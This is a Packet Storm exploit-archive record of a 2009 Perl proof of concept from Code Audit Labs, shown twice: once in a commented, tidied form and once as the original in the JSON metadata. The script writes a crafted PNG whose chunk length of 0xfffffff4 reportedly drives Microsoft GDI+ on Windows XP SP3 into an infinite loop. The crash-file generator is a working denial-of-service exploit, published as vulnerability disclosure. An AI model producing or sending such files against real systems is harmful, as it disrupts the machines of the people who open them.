ID PACKETSTORM:76770 Type packetstorm Reporter vulnhunt.com Modified 2009-04-17T00:00:00
Description
`#! /usr/bin/perl
#CAL_gdiplug_poc.pl
#
# Microsoft_gdiplug_png_infinity_loop_D.o.S POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#Tested on fully updated Windows XP SP3.
#Other versions are probably affected as well.
#
#CVE: please assign to a CVE number
#
#DESCRIPTION
#===========
#
# The vulnerability is in the Microsoft GDI+ code that processes PNG files: a crafted PNG file sends that code into an infinite loop, causing 100% CPU usage and a denial of service (D.o.S).
#
#
#ANALYSIS
#========
#
# png chunk
#
# {
# DWORD btChunkLen;
# CHAR btChunkType[4];
#} CHUNK_HEADER;
#If btChunkLen is 0xfffffff4, the code falls into an infinite loop.
#
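use strict;
use warnings;

# Build the sample PNG in memory. Layout of the bytes below:
#   - 8-byte PNG signature (89 50 4e 47 0d 0a 1a 0a)
#   - IHDR chunk: length 0x0000000d, type "IHDR", 13 data bytes,
#     CRC d9 44 a9 57
#   - a second chunk header whose length field is 0xfffffff4 and whose
#     type is "AAAA" (41 41 41 41), followed by 16 trailing bytes
# The 0xfffffff4 length is the field the advisory names as the trigger.
# NOTE(review): the PNG specification caps chunk lengths at 2^31-1, so a
# decoder that checks that bound (and the bytes remaining in the file)
# before using the length rejects this input. 0xfffffff4 plus the 12 bytes
# of per-chunk overhead (length, type, CRC) wraps to 0 in 32-bit
# arithmetic, which is presumably why the affected parser never advances;
# the page does not confirm the root cause.
my $png_bytes =
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52" .
"\x00\x00\x03\x00\x00\x00\x04\x00\x08\x02\x00\x00\x00\xd9\x44\xa9" .
"\x57\xff\xff\xff\xf4\x41\x41\x41\x41\x62\x01\x08\xcb\x06\x49\x3e" .
"\xd7\x0a\x00\x22\xe3\xf1\x32\x3e\xe8";

# Three-argument open with a lexical handle: the mode can never be taken
# from the file name, and the handle is closed when it goes out of scope.
open(my $out_fh, '>', 'poc.png') or die "can't create crash sample.$!";

# Raw mode so that no newline translation alters the 0x0a/0x0d bytes.
binmode($out_fh);

# Buffered write errors can surface at print or only at close; check both
# so a truncated sample is not mistaken for a complete one.
print {$out_fh} $png_bytes or die "can't write crash sample.$!";
close($out_fh) or die "can't close crash sample.$!";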
`
{"id": "PACKETSTORM:76770", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft GDI+ Denial Of Service", "description": "", "published": "2009-04-17T00:00:00", "modified": "2009-04-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/76770/Microsoft-GDI-Denial-Of-Service.html", "reporter": "vulnhunt.com", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:17", "viewCount": 1, "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2016-11-03T10:28:17", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:17", "rev": 2}, "vulnersScore": -0.7}, "sourceHref": "https://packetstormsecurity.com/files/download/76770/CAL_gdiplug_poc.txt", "sourceData": "`#! /usr/bin/perl \n#CAL_gdiplug_poc.pl \n# \n# Mircosoft_gdiplug_png_infinity_loop_D.o.S POC \n# by Code Audit Labs public 2009-04-17 \n# http://www.vulnhunt.com/ \n# \n#Affected \n#======== \n#test on full updated winxp sp3 \n#other version should be affected \n# \n#CVE: please assign to a CVE number \n# \n#DESCRIPTION \n#=========== \n# \n# The vulnerability exists within the code in MicroSoft Gdi+ processing crafted png file. that cause infinity loop to cause high CPU(100%) and D.o.S . \n# \n# \n#ANALYSIS \n#======== \n# \n# png chunk \n# \n# { \n# DWORD btChunkLen; \n# CHAR btChunkType[4]; \n#} CHUNK_HEADER; \n \n#if btChunkLen is 0xfffffff4, would cause code fall into infinity loop \n# \n \nopen(Fin, \">poc.png\") || die \"can't create crash sample.$!\"; \nbinmode(Fin); \n$data = \n\"\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\" . \n\"\\x00\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x08\\x02\\x00\\x00\\x00\\xd9\\x44\\xa9\" . \n\"\\x57\\xff\\xff\\xff\\xf4\\x41\\x41\\x41\\x41\\x62\\x01\\x08\\xcb\\x06\\x49\\x3e\" . \n\"\\xd7\\x0a\\x00\\x22\\xe3\\xf1\\x32\\x3e\\xe8\"; \n \nprint Fin $data; \n \nclose(Fin); \n \n \n`\n", "immutableFields": []}